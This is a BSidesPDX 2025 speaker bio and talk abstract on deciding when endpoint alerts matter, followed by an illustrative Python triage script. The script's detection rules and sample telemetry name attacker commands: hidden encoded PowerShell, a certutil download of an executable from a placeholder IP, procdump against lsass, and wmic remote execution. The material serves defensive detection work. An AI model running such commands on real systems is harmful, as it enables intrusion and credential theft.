BSidesPDX-2025

Udochi Nwobodo

Udochi Nwobodo is an Infrastructure and Product Security Engineer with over five years of experience securing large-scale systems at Adobe, Coinbase, and Juniper Networks. She has led efforts to design and deploy cloud security solutions, integrate security into product lifecycles, and build vulnerability management programs that scale with business needs.

Her work spans cloud, container, and application security as well as modern detection engineering. Beyond technical execution, Udochi focuses on strategic impact: enabling teams to balance speed with security, aligning detection thresholds with business risk, and turning raw telemetry into meaningful decisions.

She holds a Master’s degree in Cybersecurity along with CISSP and CISM certifications. Udochi is passionate about bridging the gap between engineering and strategy, helping organizations move from reactive security to proactive resilience.


Session

10-25
11:30
20min
From Suspicious Query to Real Incident: Deciding When Endpoint Alerts Really Matter
Udochi Nwobodo

Security teams drown in endpoint telemetry: processes spawned, commands executed, binaries triggered. But not every log line should become an alert, and not every alert should trigger a 2 a.m. wake-up call. The real challenge is knowing when a query result crosses the line from “informational” to “actionable.”

In this talk, I’ll walk through how different types of endpoint queries (single-process anomalies, correlated multi-event queries, and time-bounded patterns) map to thresholds that determine whether engineers should escalate or suppress. We’ll explore practical heuristics for building alert thresholds that balance false positives and false negatives, tie signals back to MITRE ATT&CK techniques, and prioritize based on host and user context.

Using an open-source EDR as a demo environment, I’ll showcase how raw suspicious process data can be transformed into high-confidence detections. The goal: give engineers and SOC analysts a framework for deciding not just what they can detect, but when they should start worrying.
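The abstract names three query classes (single-process anomalies, correlated multi-event queries, time-bounded patterns), ATT&CK mapping, and host/user context as the inputs to an escalate-or-suppress decision. The script below is an added illustration of how those pieces can be wired together; it is example code written for this page, not the speaker's demo or any EDR's API. The rule set, score cut-offs, criticality weights, the window lengths, and the sample events are all constructed assumptions.

```python
"""Tiered triage of endpoint process telemetry into suppress / informational /
actionable. Added illustration: rule set, thresholds, context weights and the
sample events are assumptions, not the speaker's framework or any EDR's API."""
import re
from collections import defaultdict, namedtuple
from datetime import datetime, timedelta

Event = namedtuple("Event", "ts host user image cmdline")
Finding = namedtuple("Finding", "kind host user techniques base_score score verdict")

# Assumed verdict cut-offs on the context-weighted score.
INFORMATIONAL_AT, ACTIONABLE_AT = 30, 70
# Assumed asset/identity criticality (0 ordinary .. 2 crown jewels).
HOST_CRIT = {"dc01": 2, "build-03": 1}
USER_CRIT = {"svc-backup": 2}
CORR_WINDOW = timedelta(seconds=120)    # window for correlating multi-event hits
FANOUT_WINDOW = timedelta(seconds=300)  # window for the time-bounded WMI pattern
FANOUT_MIN_TARGETS = 3

# Single-process anomaly rules: (ATT&CK technique, predicate, base score).
SINGLE_RULES = [
    ("T1059.001", lambda e: e.image == "powershell.exe" and " -enc" in e.cmdline.lower(), 40),
    ("T1105", lambda e: e.image == "certutil.exe" and "-urlcache" in e.cmdline.lower(), 40),
    ("T1003.001", lambda e: e.image == "procdump.exe" and "lsass" in e.cmdline.lower(), 70),
    ("T1033", lambda e: e.image == "whoami.exe", 15),  # routine recon, low on its own
]
WMI_NODE = re.compile(r"/node:(\S+)", re.IGNORECASE)


def verdict(score):
    if score >= ACTIONABLE_AT:
        return "actionable"
    return "informational" if score >= INFORMATIONAL_AT else "suppress"


def finding(kind, host, user, techniques, base):
    # Host and user context scale the base score before the cut-offs apply.
    score = base * (1 + 0.5 * (HOST_CRIT.get(host, 0) + USER_CRIT.get(user, 0)))
    return Finding(kind, host, user, tuple(sorted(techniques)), base, score, verdict(score))


def triage(events):
    events = sorted(events, key=lambda e: e.ts)
    findings = []
    # 1. Single-process anomalies: one event matched against one rule.
    hits = [(e, tech, s) for e in events for tech, pred, s in SINGLE_RULES if pred(e)]
    # 2. Correlated multi-event queries: two or more distinct techniques on one host
    #    inside CORR_WINDOW merge into one finding; merged hits are not re-reported.
    by_host = defaultdict(list)
    for h in hits:
        by_host[h[0].host].append(h)
    consumed = set()
    for host, hs in by_host.items():
        for i, (e, _, _) in enumerate(hs):
            group = [h for h in hs[i:] if h[0].ts - e.ts <= CORR_WINDOW]
            techs = {t for _, t, _ in group}
            if e not in consumed and len(techs) >= 2:
                consumed.update(h[0] for h in group)
                findings.append(finding("correlated", host, e.user, techs, sum(s for _, _, s in group)))
    findings += [finding("single", e.host, e.user, [t], s) for e, t, s in hits if e not in consumed]
    # 3. Time-bounded pattern: one user driving remote WMI execution (T1047) at
    #    FANOUT_MIN_TARGETS or more distinct hosts within FANOUT_WINDOW.
    fanout = defaultdict(list)
    for e in events:
        m = WMI_NODE.search(e.cmdline) if e.image == "wmic.exe" else None
        if m:
            fanout[(e.host, e.user)].append((e.ts, m.group(1).lower()))
    for (host, user), rows in fanout.items():
        for i, (ts, _) in enumerate(rows):
            if len({tgt for t2, tgt in rows[i:] if t2 - ts <= FANOUT_WINDOW}) >= FANOUT_MIN_TARGETS:
                findings.append(finding("time_bounded", host, user, ["T1047"], 75))
                break
    return findings


def _t(s):
    return datetime.fromisoformat(s)

# Constructed sample telemetry for the demo (not captured from any real system).
EVENTS = [
    # ws-017: encoded PowerShell, then a certutil download eight seconds later.
    Event(_t("2025-10-25T02:00:01"), "ws-017", "alice", "powershell.exe", "powershell -NoP -W Hidden -enc SQBFAFgAIAAo"),
    Event(_t("2025-10-25T02:00:09"), "ws-017", "alice", "certutil.exe", "certutil -urlcache -f http://198.51.100.7/a.exe %TEMP%\\a.exe"),
    # ws-042: the same encoded PowerShell in isolation, plus routine recon five minutes later.
    Event(_t("2025-10-25T03:10:00"), "ws-042", "bob", "powershell.exe", "powershell -enc SQBFAFgAIAAo"),
    Event(_t("2025-10-25T03:11:00"), "ws-042", "bob", "notepad.exe", "notepad.exe notes.txt"),
    Event(_t("2025-10-25T03:15:00"), "ws-042", "bob", "whoami.exe", "whoami /all"),
    # dc01: the same isolated encoded PowerShell, but as a privileged service account on a DC.
    Event(_t("2025-10-25T04:00:00"), "dc01", "svc-backup", "powershell.exe", "powershell -enc SQBFAFgAIAAo"),
    # ws-009: one user fanning remote WMI execution out to three servers in 70 seconds.
    Event(_t("2025-10-25T14:00:00"), "ws-009", "carol", "wmic.exe", "wmic /node:srv-01 process call create cmd.exe"),
    Event(_t("2025-10-25T14:00:30"), "ws-009", "carol", "wmic.exe", "wmic /node:srv-02 process call create cmd.exe"),
    Event(_t("2025-10-25T14:01:10"), "ws-009", "carol", "wmic.exe", "wmic /node:srv-03 process call create cmd.exe"),
]

if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f"{f.verdict:13} {f.kind:13} {f.host}/{f.user} {','.join(f.techniques)} score={f.score:.0f}")
```

Run stand-alone, the sample produces the three outcomes the abstract distinguishes: the two ws-017 hits are each only informational on their own but become one actionable finding once correlated inside the window; the identical encoded PowerShell on ws-042 stays informational, while on dc01 under a privileged service account the context weight alone pushes it to actionable; bob's whoami is suppressed; and carol's WMI fan-out is flagged only because three distinct targets fell inside the five-minute window, not because any single wmic invocation is suspicious.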

Talk 2